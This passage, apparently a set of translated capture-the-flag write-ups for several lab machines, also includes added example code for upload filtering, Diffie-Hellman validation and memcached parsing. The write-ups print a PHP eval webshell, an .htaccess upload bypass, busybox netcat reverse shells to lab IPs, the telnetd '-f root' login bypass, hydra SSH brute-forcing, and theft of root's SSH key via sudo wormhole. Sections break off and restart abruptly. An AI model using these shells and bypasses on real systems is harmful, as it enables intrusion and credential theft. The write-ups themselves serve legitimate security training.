[20:07:13] 200 - 454B - /uploads/
```

/uploads/ is listable and already contains an avatar image uploaded by the user 111, a clear hint that the image upload is the intended way in.

Method 1

Save 2.php as 2.png, upload it, then connect to it with AntSword (蚁剑):

```php
<?php @eval($_POST['cmd']);?>
```


A password is found under /opt:

Eecho:2VQzte2RBr8p8MuOA0Gw2Sum

Method 2

Prefixing the payload with GIF89a and trying filename=reverse.php, .phtml and .phar were all rejected, so the filter is an extension blacklist.

Upload a .htaccess file (directly, or through Burp) with this content:

```apache
AddType application/x-httpd-php .jpg
```

This Apache-specific directive makes the server hand files ending in .jpg to the PHP handler instead of serving them as images. It only takes effect because the upload directory honours per-directory .htaccess overrides (AllowOverride permits FileInfo); with AllowOverride None the file would be ignored.

Then upload nc.jpg (nc.php renamed) and request it to get the reverse shell:

```php
<?php exec("busybox nc 192.168.3.4 1111 -e /bin/bash"); ?>
```
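Both methods above beat the same weakness: the upload handler looks only at the file extension and only against a short deny-list. As an added example (not the tmpfile.dsz application's code), here is that kind of filter next to a stricter one: extension allow-list, no dotfiles (so .htaccess is refused), magic-byte check on the body, rejection of a PHP open tag inside an otherwise valid image, and a server-chosen random filename. The function names, the allow-list, and the constructed sample uploads are this example's own assumptions; only the payload bodies are copied from the page.

```python
# Added example, not from the target application: a blacklist upload filter
# of the kind both methods above bypass, beside a hardened one.
import os
import secrets
from typing import Optional

SCRIPT_BLACKLIST = {".php", ".phtml", ".phar"}

# extension -> bytes the body must start with
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def blacklist_filter(filename: str) -> bool:
    """Vulnerable: only the extension is inspected, and only against a short
    deny-list. '2.png' with PHP inside, 'nc.jpg' and '.htaccess' all pass."""
    _, ext = os.path.splitext(filename.lower())
    return ext not in SCRIPT_BLACKLIST


def strict_filter(filename: str, data: bytes) -> Optional[str]:
    """Hardened: returns the server-side name to store under, or None.
    Rejects dotfiles/config files, extensions outside the allow-list, bodies
    that do not start with that type's magic bytes, and any '<?' in the body
    (a PHP open tag in a valid image is a polyglot, e.g. 'GIF89a<?php ...')."""
    base = os.path.basename(filename)
    if not base or base.startswith("."):
        return None
    _, ext = os.path.splitext(base.lower())
    magic = IMAGE_MAGIC.get(ext)
    if magic is None or not data.startswith(magic):
        return None
    if b"<?" in data:
        return None
    # the client-chosen name is discarded entirely
    return secrets.token_hex(16) + ext


# constructed sample uploads, modelled on the page's payloads
SAMPLES = {
    "2.png": b"<?php @eval($_POST['cmd']);?>",
    "nc.jpg": b'<?php exec("busybox nc 192.168.3.4 1111 -e /bin/bash"); ?>',
    ".htaccess": b"AddType application/x-httpd-php .jpg\n",
    "reverse.phtml": b"<?php system($_GET['c']); ?>",
    "cat.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 32,
    "poly.gif": b"GIF89a<?php system($_GET['c']); ?>",
}


def evaluate(samples: dict) -> dict:
    """Run both filters over the samples; True means the upload is accepted."""
    return {
        name: {
            "blacklist": blacklist_filter(name),
            "strict": strict_filter(name, body) is not None,
        }
        for name, body in samples.items()
    }


if __name__ == "__main__":
    for name, verdict in evaluate(SAMPLES).items():
        print(f"{name:15} blacklist={verdict['blacklist']!s:5} strict={verdict['strict']}")
```

Even the strict variant is only one layer: the upload directory should additionally be served with PHP execution disabled and AllowOverride None, so that a file which slips through is never interpreted.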

2. SSH

Log in as Eecho with the password found under /opt and read the user flag:

```bash
cat user.txt
flag{user-c2fdb0243cc742b18dcb4e5e68eed318}
```

Look for SUID binaries owned by root; nothing beyond the stock Debian set turns up, so this is not the path:

```bash
find / -user root -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
```

Listing processes and listening sockets shows a telnetd bound to localhost on port 23, which matches the recently disclosed telnetd vulnerability:
https://mp.weixin.qq.com/s?__biz=Mzk0MDQzNzY5NQ==&mid=2247494187&idx=1&sn=a91383587d33514f16787771ad5ebb7c&chksm=c3543eef0b49c5bff27c58a2c6154e256eced2f98a5a72cb9b73cd2579cafeb2b72dec675cee&mpshare=1&scene=23&srcid=0125VjcX4sgoiMS4vSYuzuSM&sharer_shareinfo=a2b798aab7f658305d3591e85f619072&sharer_shareinfo_first=a2b798aab7f658305d3591e85f619072#rd

```bash
ps -ef
# or
ss -tlnup
```

3. Privilege escalation

With `-a`, busybox telnet sends the USER environment variable as the login name; telnetd passes it to login unsanitised, where `-f root` is parsed as login's own "pre-authenticated" option, so no password is asked:

```text
Eecho@Happiness:~$ USER='-f root';busybox telnet -a 127.0.0.1 23

Entering character mode
Escape character is '^]'.


Linux 4.19.0-27-amd64 (localhost) (pts/1)

Last login: Thu Jan 22 23:44:10 EST 2026 from 192.168.1.12 on pts/0
Linux Happiness 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@Happiness:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Happiness:~# cd /root
root@Happiness:~# ls -l
total 4
-rw-r--r-- 1 root root 44 Jan 22 12:59 root.txt
root@Happiness:~# cat root.txt
flag{root-b52bb1635e544c3f968822ab6c7a745d}
```

Vulnerability summary

| Field                   | Value                                        |
|-------------------------|----------------------------------------------|
| CVE ID                  | CVE-2026-24061                               |
| Name                    | GNU Inetutils telnetd remote code execution  |
| Type                    | Remote code execution (RCE)                  |
| Severity                | High / Critical                              |
| Affected component      | inetutils-telnetd                            |
| Affected versions       | <= 2.7 (before the fix)                      |
| Protocol / port         | TCP / 23                                     |
| Authentication required |                                              |
| Remotely exploitable    |                                              |

On this box telnetd only listened on 127.0.0.1, which is why it was reached from the Eecho shell rather than over the network.

1. Information gathering

```text
☁  ~  nmap -sVC -p- 192.168.43.22
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-27 13:48 CST
Nmap scan report for Hellman (192.168.43.22)
Host is up (0.00083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http nginx
|_http-title: Diffie-Hellman Challenge Guide
1337/tcp open waste?
| fingerprint-strings:
| GenericLines, NULL:
| Alice has sent you her public key.
| You've also been given your private key.
| calculate your shared secret.
| 2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
| 83718076477540133697440395120117835062181904167228720512476185863669857584047
| 212342370420933673207864818760960324446462215689498300223051341779379473245095051006710080216230349918786430922058134497158989814626884030339600682340156150947173905751911455609989553852462040979814548021746725865844131953108133
| GetRequest:
| Alice has sent you her public key.
| You've also been given your private key.
| calculate your shared secret.
| 2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
| 33715088859495353754210093143765893163188054236512902547692153953800870588417
|_ 481309894595139895576935804649545675026888596928312834425647619101039796093993856630859979042427315278439553195674311107889704665097834902532403378354040871082687754961566673252155492208765899193527551492165178606420001437506971
```

Given the hostname, this is plainly a Diffie-Hellman exercise. The service on 1337 prints a long first number that is identical across connections (presumably the prime modulus p), then two shorter numbers that change on every connection (Alice's public value and our private value), and asks for the shared secret, which is pow(peer_public, our_private, p). The page does not record the generator, or which of the two shorter numbers plays which role.
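As an added worked example (not from the Hellman box), the full finite-field Diffie-Hellman exchange that the 1337 service is asking one side of, together with the checks a client should run on values a server hands it: that p is prime and that the peer's public value is not one of the degenerate values 0, 1 or p-1 that force a predictable secret. Since the page shows neither the generator nor which number is which, the example uses its own constructed parameters, the Mersenne prime p = 2**127 - 1 and g = 3, with fixed private exponents in the test; with the real values the answer is simply pow(A, b, p) once the roles are identified.

```python
# Added example, not from the Hellman service: both sides of a DH exchange
# with the parameter checks a client should perform before computing A**b mod p.
import hashlib
import secrets
from typing import Optional

P = (1 << 127) - 1   # constructed parameters for the demo: a known prime, and g = 3
G = 3


def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin; enough to refuse a composite 'p' handed to us by a server."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def validate_public(p: int, peer_public: int) -> None:
    """Reject values that make the secret predictable: 1 and p-1 yield 1 or +/-1
    for every exponent, and 0 or out-of-range values are malformed."""
    if not is_probable_prime(p):
        raise ValueError("p is not prime")
    if not 2 <= peer_public <= p - 2:
        raise ValueError("peer public value out of range")


def public_key(p: int, g: int, private: int) -> int:
    return pow(g, private, p)


def shared_secret(p: int, peer_public: int, private: int) -> int:
    """The step the challenge asks for: s = A**b mod p, after validation."""
    validate_public(p, peer_public)
    return pow(peer_public, private, p)


def derive_key(secret: int, p: int) -> bytes:
    """Never use the raw integer as a key; hash its fixed-width big-endian encoding."""
    width = (p.bit_length() + 7) // 8
    return hashlib.sha256(secret.to_bytes(width, "big")).digest()


def exchange(p: int = P, g: int = G,
             a: Optional[int] = None, b: Optional[int] = None) -> dict:
    """Both sides of the protocol run locally; a/b default to random exponents."""
    a = a if a is not None else secrets.randbelow(p - 2) + 1
    b = b if b is not None else secrets.randbelow(p - 2) + 1
    A = public_key(p, g, a)            # Alice publishes A = g**a
    B = public_key(p, g, b)            # Bob publishes   B = g**b
    s_alice = shared_secret(p, B, a)   # Alice computes B**a
    s_bob = shared_secret(p, A, b)     # Bob computes   A**b
    return {"A": A, "B": B, "alice": s_alice, "bob": s_bob, "key": derive_key(s_bob, p)}


if __name__ == "__main__":
    r = exchange()
    print("secrets agree:", r["alice"] == r["bob"], "key:", r["key"].hex())
```

For the challenge itself only `shared_secret` matters; the rest is there because a service that dictates p and the peer value is exactly the situation in which skipping the validation is unsafe.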

1. nmap

  • Fast full-port sweep to find open ports

```bash
sudo nmap -n -Pn -sS -p- --min-rate 5000 192.168.3.25
```

| Option          | Meaning                      | Effect |
|-----------------|------------------------------|--------|
| -n              | No DNS resolution            | Skip reverse DNS and show IPs only; faster |
| -Pn             | Skip host discovery          | Assume the host is up and go straight to port scanning; useful when ICMP is filtered |
| -sS             | TCP SYN (half-open) scan     | Send SYN, treat SYN-ACK as open, then RST; faster and quieter than a full connect |
| -p-             | All ports                    | Scan all 65535 TCP ports instead of the default top 1000 |
| --min-rate 5000 | Minimum send rate            | At least 5000 probes per second; much faster, but noisier and more likely to be rate-limited or dropped |
| 192.168.3.25    | Target                       | The host to scan |

  • Then probe 22, 80 and 11211 for service versions and run the default NSE scripts

```bash
nmap -sVC -p 22,80,11211 192.168.3.25
```

2. 11211/TCP (memcache)

Reference for testing:

11211 - Pentesting Memcache - HackTricks

  • Connect (telnet, or nc)

```text
➜  ~ telnet 192.168.3.25 11211
Trying 192.168.3.25...
Connected to 192.168.3.25.
Escape character is '^]'.
version
VERSION 1.6.18
```

Telnet is a plain TCP client that doubles as a port tester: it confirms connectivity and lets you type a text protocol by hand without any extra tooling, which is why it is used here to complement the nmap results and talk to memcached directly. Memcached's text protocol has no authentication at all, so an instance reachable beyond localhost gives every client full read and write access to the cache.

  • List slabs to locate stored items

```text
stats items
STAT items:1:number 1
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 1
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 4065
STAT items:1:mem_requested 82
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 11
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 1
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 0
STAT items:1:hits_to_temp 0
END
```

  • Dump

`stats cachedump <slab> <limit>` lists the keys stored in a slab (limit 0 means as many as it will return) and `get <key>` fetches the value. This yields the password **NewPassword2025**, but no username.

```text
stats cachedump 1 0
ITEM password [15 b; 0 s]
END
get password
VALUE password 0 15
NewPassword2025
END
```
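The manual `stats items` → `stats cachedump` → `get` walk above is easy to script. As an added example (not code from the page), here is a small client that performs it, with the response parsers exercised on transcripts constructed from the session shown. `dump_memcached` needs a reachable server and is not run here; the parsers are. One caveat: `stats cachedump` is a debug command that returns at most one page of keys per slab and that newer builds may cap or disable, so an empty dump does not prove the cache is empty. The function names and the host/port defaults are this example's own.

```python
# Added example, not from the page: scripted version of the
# stats items -> stats cachedump -> get enumeration done by hand above.
import re
import socket
from typing import Dict, List

ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")
SLAB_RE = re.compile(r"^STAT items:(\d+):number (\d+)$")


def parse_slab_ids(stats_items: str) -> List[int]:
    """From 'STAT items:<slab>:number N' lines, return the slab ids that hold items."""
    slabs = []
    for line in stats_items.splitlines():
        m = SLAB_RE.match(line.strip())
        if m and int(m.group(2)) > 0:
            slabs.append(int(m.group(1)))
    return slabs


def parse_cachedump(dump: str) -> List[str]:
    """From 'ITEM key [n b; t s]' lines, return the key names."""
    return [m.group(1) for m in (ITEM_RE.match(l.strip()) for l in dump.splitlines()) if m]


def parse_get(reply: bytes) -> Dict[str, bytes]:
    """Parse a 'get' reply: VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n ... END\\r\\n."""
    values: Dict[str, bytes] = {}
    pos = 0
    while True:
        nl = reply.index(b"\r\n", pos)
        header = reply[pos:nl]
        if header == b"END":
            return values
        _, key, _flags, length = header.split(b" ")[:4]   # optional 5th field is the CAS id
        start = nl + 2
        end = start + int(length)
        values[key.decode()] = reply[start:end]
        pos = end + 2   # skip the \r\n that terminates the data block


def _command(sock: socket.socket, cmd: str) -> bytes:
    """Send one text-protocol command and read until the END terminator."""
    sock.sendall(cmd.encode() + b"\r\n")
    buf = b""
    while not buf.endswith(b"END\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def dump_memcached(host: str, port: int = 11211, timeout: float = 5.0) -> Dict[str, bytes]:
    """Walk every populated slab, list its keys, fetch every value. Needs a live server."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        slabs = parse_slab_ids(_command(sock, "stats items").decode())
        found: Dict[str, bytes] = {}
        for slab in slabs:
            keys = parse_cachedump(_command(sock, f"stats cachedump {slab} 0").decode())
            if keys:
                found.update(parse_get(_command(sock, "get " + " ".join(keys))))
        return found


# constructed transcripts, trimmed from the session shown above
SAMPLE_STATS = "STAT items:1:number 1\r\nSTAT items:1:number_hot 0\r\nSTAT items:1:age 4065\r\nEND\r\n"
SAMPLE_DUMP = "ITEM password [15 b; 0 s]\r\nEND\r\n"
SAMPLE_GET = b"VALUE password 0 15\r\nNewPassword2025\r\nEND\r\n"

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.3.25"
    for k, v in dump_memcached(target).items():
        print(k, "=", v)
```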

3. 22/TCP (SSH)

1. Brute-force the username (hydra)

names.txt download link

Hydra finds the username alan:

```text
hydra -t 64 -L /opt/names.txt -p NewPassword2025 -f -V ssh://192.168.3.25
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10713 login tries (l:10713/p:1), ~168 tries per task
[DATA] attacking ssh://192.168.3.25:22/
[ATTEMPT] target 192.168.3.25 - login "aaliyah" - pass "NewPassword2025" - 1 of 10713 [child 0] (0/0)
[ATTEMPT] target 192.168.3.25 - login "aaren" - pass "NewPassword2025" - 2 of 10713 [child 1] (0/0)
#.......
[22][ssh] host: 192.168.3.25 login: alan password: NewPassword2025
```

| Option              | Purpose |
|---------------------|---------|
| hydra               | The THC brute-forcing tool; supports SSH, FTP, HTTP and many other services |
| -t 64               | 64 parallel tasks. Fine on a lab network; against real targets use 4-16, since sshd's MaxStartups drops surplus unauthenticated connections and defences will notice |
| -L /opt/names.txt   | Username list (upper-case L), one name per line; contrast -l (lower case) for a single username |
| -p NewPassword2025  | Single known password (lower-case p), for the case where one password is suspected to be shared; contrast -P (upper case) for a password list |
| ssh://192.168.3.25  | Target: SSH on 192.168.3.25. Port 22 is implied; use ssh://host:port for a non-default port |
| -f                  | Stop after the first valid login/password pair |
| -V                  | Verbose: print every login/password attempt as it is made (it does not print version information) |

2. Log in

```text
➜  ~ sshpass -p 'NewPassword2025' ssh alan@192.168.3.25 -o StrictHostKeyChecking=no
Warning: Permanently added '192.168.3.25' (ED25519) to the list of known hosts.
alan@memory:~$ id
uid=1000(alan) gid=1000(alan) grupos=1000(alan)
```

sshpass feeds a password to ssh so the login is non-interactive. Passing it with -p puts the password into the process list and the shell history; `sshpass -f <file>` or the SSHPASS environment variable avoids that.

4. Privilege escalation

sudo

User **alan** may run **/usr/bin/wormhole** as root via sudo, without a password:

```text
alan@memory:~$ sudo -l
Matching Defaults entries for alan on memory:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User alan may run the following commands on memory:
(root) NOPASSWD: /usr/bin/wormhole
```

```text
alan@memory:~$ sudo /usr/bin/wormhole --help
Usage: wormhole [OPTIONS] COMMAND [ARGS]...

Create a Magic Wormhole and communicate through it.

Wormholes are created by speaking the same magic CODE in two different
places at the same time. Wormholes are secure against anyone who doesn't
use the same code.

Options:
--appid APPID appid to use
--relay-url URL rendezvous relay to use
--transit-helper tcp:HOST:PORT transit relay to use
--dump-timing FILE.json (debug) write timing data to file
--version Show the version and exit.
--help Show this message and exit.

Commands:
help
receive Receive a text message, file, or directory (from 'wormhole send')
send Send a text message, file, or directory
ssh Facilitate sending/receiving SSH public keys
```

`send` transmits a text message, file or directory, and because the process runs as root it can read any file on the system; that is the primitive used below. (The `ssh` subcommand helps exchange SSH public keys.)

Usage

Because wormhole runs as root, `send` can read and ship root's private key **/root/.ssh/id_rsa**.

  • Send

```text
alan@memory:~$ sudo  /usr/bin/wormhole send /root/.ssh/id_rsa
Sending 2.6 kB file named 'id_rsa'
Wormhole code is: 5-eskimo-cleanup
On the other computer, please run:

wormhole receive 5-eskimo-cleanup

Sending (<-192.168.3.25:53750)..
100%|████████████████████████████████████████████████████████████████████████████████████████████| 2.59k/2.59k [00:00<00:00, 452kB/s]
File sent.. waiting for confirmation
Confirmation received. Transfer complete.
```

  • Receive (in a second terminal; here a second SSH session as alan on the same box, running wormhole unprivileged)

```text
➜  ~ sshpass -p 'NewPassword2025' ssh alan@192.168.3.25 -o StrictHostKeyChecking=no
alan@memory:~$ wormhole receive 5-eskimo-cleanup
Receiving file (2.6 kB) into: id_rsa
ok? (Y/n): Y
Receiving (->tcp:192.168.3.25:36589)..
100%|███████████████████████████████████████████████████████████████████████████████████████████| 2.59k/2.59k [00:00<00:00, 12.4kB/s]
Received file written to id_rsa
```

Both sides must reach the rendezvous relay (the project's public server unless --relay-url points elsewhere) to pair on the code; the file data itself travels over the direct connection shown in the output.

Flags

Use the key to log in as root and locate **user.txt** and **root.txt**:

```text
alan@memory:~$ chmod 600 id_rsa
alan@memory:~$ ssh -i id_rsa root@192.168.3.25
root@memory:~# find / -name user.txt -o -name root.txt 2>/dev/null | xargs cat
db516ff5b787b724346d84f61fc5c702
9d1e64f050e5b8ebf3b78fa84199b3cd
root@memory:~#
```

1. Discovery

```text
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.3.1 18:d9:8f:c8:68:38 Huawei Device Co., Ltd.
192.168.3.4 00:e0:4c:4d:2a:68 REALTEK SEMICONDUCTOR CORP.
192.168.3.5 b4:2e:99:cc:28:45 GIGA-BYTE TECHNOLOGY CO.,LTD.
192.168.3.192 08:00:27:99:e3:83 PCS Systemtechnik GmbH
```

IP : 192.168.3.192

nmap

```text
┌──(root㉿kali)-[~]
└─# nmap -p- -A -sVC 192.168.3.192
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 11:44 CST
Nmap scan report for 192.168.3.192
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:99:E3:83 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.3.192

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.41 seconds
```

wfuzz subdomain enumeration

==Watch for subdomains==

```text
┌──(root㉿kali)-[~]
└─# wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u moodle.dsz -H 'Host: FUZZ.moodle.dsz' --hh 20
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://moodle.dsz/
Total requests: 4989

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 303 52 L 132 W 1482 Ch "www"
000000019: 200 95 L 174 W 2512 Ch "dev"

Total time: 0
Processed Requests: 4989
Filtered Requests: 4987
Requests/sec.: 0
```

Or with a larger list: `wfuzz -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u moodle.dsz -H 'Host: FUZZ.moodle.dsz' --hh 20`

--hh 20

  • --hh means "hide responses with this many characters"; the h-family filters are --hc (status code), --hl (lines), --hw (words) and --hh (chars). It is not a hash: 20 is the body length, in characters, of the response the server returns for a Host header it does not recognise.
  • Why it works:
    1. For a non-existent virtual host the server returns the same default response every time, so its length is constant; here that default body is 20 characters long.
    2. Without the filter wfuzz prints one line per wordlist entry (about 5000 here, 100000 with the larger list), nearly all of them that identical default response.
    3. --hh 20 hides exactly those, leaving only hosts that answered differently: www (a 303 redirect) and dev (200). Measure the baseline first by sending a bogus Host header; the right number differs from target to target.

dirsearch

==Edit /etc/hosts==

```text
╭─root@kali ~
╰─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

#test
192.168.3.192 dev.moodle.dsz
```

Show only responses with status 200:

```text
root@kali:~ ▶ dirsearch -u http://dev.moodle.dsz -i 200
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_dev.moodle.dsz/_26-01-13_22-01-23.txt

Target: http://dev.moodle.dsz/

[22:01:23] Starting:
[22:01:48] 200 - 74MB - /backup.tar.gz

Task Completed
```

2. Analysis

curl

Download the archive locally:

```bash
curl -O http://dev.moodle.dsz/backup.tar.gz
```

Unpack it and read config.php: it contains a password, pzp5V2Of3akjaJrhRauR.

login

During testing /etc/hosts needs a second entry, `192.168.3.192 moodle.dsz`, for the main site.

https://github.com/p0dalirius/Moodle-webshell-plugin/tree/master?tab=readme-ov-file packages a webshell as a Moodle plugin; the GitHub README has a video showing the upload.

Download the plugin, then install it through Moodle's plugin installer ("Upload a file").

hackbar

Request http://moodle.dsz/local/moodle_webshell/webshell.php?action=exec&cmd=id to confirm the shell executes commands.

nc reverse shell

With a listener waiting on 192.168.3.48:1111 (the spaces must be URL-encoded as %20 if the request is sent with curl rather than HackBar):

```text
http://moodle.dsz/local/moodle_webshell/webshell.php?action=exec&cmd=busybox nc 192.168.3.48 1111 -e /bin/bash
```

3. On the box

Look for useful information:

```text
www-data@Moodle:/opt$ cat hint.txt
cat hint.txt
root's credentials are hidden in plain sight
// ^[a-zA-Z0-9]{20}$

www-data@Moodle:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
kotori:x:1000:1000:,,,:/home/kotori:/bin/bash
www-data@Moodle:/tmp$
```

The only ordinary user is kotori, and the password from config.php, pzp5V2Of3akjaJrhRauR, is also kotori's login password (credential reuse).

Option 1

Search according to the hint: a 20-character alphanumeric token somewhere readable.

```bash
kotori@Moodle:~$ grep -raohE '\b[a-zA-Z0-9]{20}\b' /etc /var/www /opt /home 2>/dev/null >> a.txt
kotori@Moodle:~$ ls -l
total 1444
-rw-r--r-- 1 kotori kotori 1135334 Jan 13 09:46 a.txt
-rw-r--r-- 1 kotori kotori 332111 Apr 17 2023 linpeas.sh
-rw-r--r-- 1 root root 44 Dec 26 22:22 user.txt
```

[!Info] The grep options
-r --recursive
Recurse into the given directories, including every subdirectory.

-a --text / --binary-files=text
Treat every file, binary ones included (executables, images), as text, so grep does not skip them and still extracts any readable alphanumeric strings they contain.

-o --only-matching
Print only the part that matches the expression rather than the whole line; this is what yields bare 20-character tokens.
-h --no-filename
Omit the file name from the output, leaving just the token (drop this option if you want to know where each one came from).

-E --extended-regexp
Extended regular expressions, so {20} does not have to be escaped as \{20\}.

[!NOTE] ##### The regular expression

\b[a-zA-Z0-9]{20}\b is the heart of the command:

  • \b word boundary: the match must be a whole "word", not part of a longer run. sF6Kfzr69w7dyZALAhl6 matches on its own but not inside prefix_sF6Kfzr69w7dyZALAhl6_suffix (the underscore is a word character, so there is no boundary there).
  • [a-zA-Z0-9]: a character class matching one upper- or lower-case letter or digit.
